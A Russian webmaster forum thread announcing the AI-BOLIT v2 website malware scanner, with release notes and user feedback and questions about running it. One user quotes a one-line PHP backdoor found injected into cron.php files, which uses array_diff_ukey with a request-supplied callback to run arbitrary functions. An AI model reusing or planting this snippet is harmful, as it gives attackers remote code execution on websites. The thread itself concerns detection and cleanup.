Форум Сайтостроение Безопасность

Сканер вирусов и вредоносного кода AI-BOLIT v2

12345 6
gregzem
На сайте с 22.11.2004
Offline
134
gregzem
19246

Анонсируем новую версию сканера вредоносного кода AI-BOLIT. Эту версию можно считать AI-BOLIT v2.

Что нового в версии 2?

Предыдущий топик с обсуждениями был здесь, но устарел.

Полный перечень возможностей сканера.

Сканер AI-BOLIT умеет:

  • искать вирусы, вредоносные и хакерские скрипты на хостинге: шеллы по сигнатурам и гибким паттернам, шеллы на основе несложной эвристики - все то, что обычные антивирусы и сканеры найти не могут
  • искать уязвимые скрипты timthumb, fckeditor, uploadify, и ряд других
  • искать редиректы в .htaccess на вредоносные сайты
  • искать код ссылочных бирж, таких как sape/trustlink/linkfeed/... в .php файлах
  • определять каталоги и файлы дорвеев
  • искать пустые ссылки (невидимые ссылки) в шаблонах
  • показывать директории, открытые на запись
  • работать со всеми cms без исключения (joomla, wordpress, drupal, dle, bitrix, phpbb,...)
  • отсылать отчет по email или сохранять в файл

Скачать сканер можно на странице http://revisium.com/ai/

Инструкция по работе и часто-задаваемые вопросы.

Если самостоятельно вы не можете разобраться с отчетом, присылайте его в виде .zip архива на ai@revisium.com с пометкой "Отчет AI-BOLIT для анализа".

Антивирус для ISPmanager (https://revisium.com/ru/products/antivirus_for_ispmanager/) | Антивирус для Plesk (https://plesk.revisium.com) | Профессиональное лечение и защита сайтов (https://revisium.com/)
Maxim-KL
На сайте с 26.01.2011
Offline
350
Maxim-KL
#1

gregzem, Спасибо, первая мне действительно помогла и даже не раз. Надеюсь вторая будет еще лучше.

Мои услуги по прогонам: ✅Качественный ручной статейный прогон по базе сайтов с ИКС10+ (maximgroups.net/progon-statejnyj) ✅Прогон Максимум - Все включено, 300+ качественных ссылок (maximgroups.net/progon-maksimum)
ProLiant
На сайте с 07.12.2005
Offline
249
ProLiant
#2

Да, действительно, довольно хороший скрипт. Плюс обращался за услугами к gregzem. Остались только положительные впечатления от сотрудничества.

Выбирай оптимальный хостинг (http://cp.inferno.name/aff.php?aff=2053) для стабильного заработка на файловом трафе (https://espays.com/s.php?f=38). ;)
R
На сайте с 29.08.2005
Offline
139
Ruslay
#3

Хороший скрипт, но новая версия поначалу шокирует красным сообщением "Внимание! На вашем сайте обнаружен вредоносный код", которое появляется и на чистых сайтах (старая версия ругалась только при реальном обнаружении вирусов). Это заставляет вебмастера понапрасну нервничать, к счастью, ниже появляется зеленая надпись "Вредоносные скрипты не найдены", которая несколько успокаивает. Как хочешь, так и понимай :)

Одним словом, юзабилити новой версии требует существенного улучшения.

gif ai-bolit.gif
gregzem
На сайте с 22.11.2004
Offline
134
gregzem
#4
Ruslay:

Одним словом, юзабилити новой версии требует существенного улучшения.

Поправим в следующем релизе. Спасибо.

griped
На сайте с 22.08.2010
Offline
71
griped
#5

Спасибо, посоветую товарищу, тем более бесплатно.

anser06
На сайте с 11.03.2006
Offline
276
anser06
#6

Спасибо автору за бесплатный скрипт, который несколько раз выручал.

gregzem
На сайте с 22.11.2004
Offline
134
gregzem
#7

Релиз AI-BOLIT 20150508

http://revisium.com/ai/

Что нового:

- новые сигнатуры хакерских скриптов, фишинговых страниц, вирусов в JS

- исправлена ошибка оптимизированного поиска

- исправлена ошибка сканирования через браузер

- добавлены aknown файлы для #wordpress, #joomla, #magento

- изменен процесс сканирования и отчет для блока "предупреждения"

Рекомендуем скачать и проверить сайты новой версией в режиме "параноидальный".

Бонус треком сегодня следующие ссылки:

- Наша статья "Сделайте 4 ошибки и попрощайтесь со своим сайтом" про ошибки управления, которые приводят к потере сайта

- Презентация с конференции Failover 2015 "Сайт под атаками" про нецелевые атаки на сайт и защиту от них

- совместный проект команды безопасного поиска Яндекса и нашей компании "Ревизиум"

- ссылка на нашу группу "Безопасность сайтов" в ВК, где выкладываем анонсы уязвимостей, материал по защите сайтов от взлома и много другой полезной информации для веб-мастеров и владельцев сайтов.

- наш твиттер @revisium

AR
На сайте с 23.11.2014
Offline
18
AntonRa
#8

Скрипт наикрутейший) Выручал не однократно. Единственно что хотелось бы, сокращение времени проверки..

Надёжные VPC (https://selectel.ru/?ref_code=9PDbQ7YbKH32) для серьёзных проектов.
draff
На сайте с 30.03.2010
Offline
65
draff
#9
AntonRa:
Единственно что хотелось бы, сокращение времени проверки..

Зависит от веса сайта. Если скрипт не успевает срабатывать на хостинге с корня сайта, ложу айболит поочередно в каждую папку и запускаю.

Удалю вирус с сайта Джумла! (http://joomlaforum.ru/index.php/topic,254903.0.html)
D
На сайте с 08.10.2006
Offline
194
Djusha
#10

Здравствуйте! Доброго времени и спасибо за скрипт :)

несколько вопросов

1. Каким образом в терминале запустить скрипт, чтобы он фоном работал, и продолжал работать после отключения от терминала

пробую так, он работает, но вылетает после выключения терминала... приходится компьютер включеный оставлять это раз.

Второе... инет пропадает временами и отключается скрипт ...

php -q /home/mypath/data/ai-bolit/ai-bolit.php --path=/home/mypath/data/www/ --report=/home/mypath/data/ai-bolit/rep.html --mode=0 --size=2000K > /dev/null 2

2. Имеется ли возможность, чтобы скрипт писал отчет сразу после нахождения подозрительных файлов?

Скрипт очень долго проверяет, можно было бы уже начинать чистить проблемные файлы... до окончания работы скрипта

3. разбираюсь с последствиями... файлы cron.php были перезаписаны вот этим кодом...

<?php @array_diff_ukey(@array((string)$_REQUEST['password']=>1),@array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']); ?>

Вроде крон для них не должен был запустится, но если так, Что могли сделать этим кодом?

4. Отчет выводит жутко бледными буквами, можно ли где то самому цвета поправить на более контрастные?

Спасибо!!!

---------- Добавлено 20.05.2015 в 13:30 ----------

Таки да :) http://habrahabr.ru/post/137337/ помогло,

вот так получается запускать

$ php -q script.php < /dev/null > script.log &

остальные вопросы остались, плюс вопрос про формат игнор листа

.adirignore

записал вот так...

/webstat/

/config/cache/

но вроде не игнорирует, все равно проверяет... или я не прав?

А маски можно? можно пример?

тот же вопрос по формату .aignore

хотелось бы с масками и примерами!!!

Спасибо!

Разработка сайтов от KAstudio.ru ( https://kastudio.ru/ )
12345 6

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий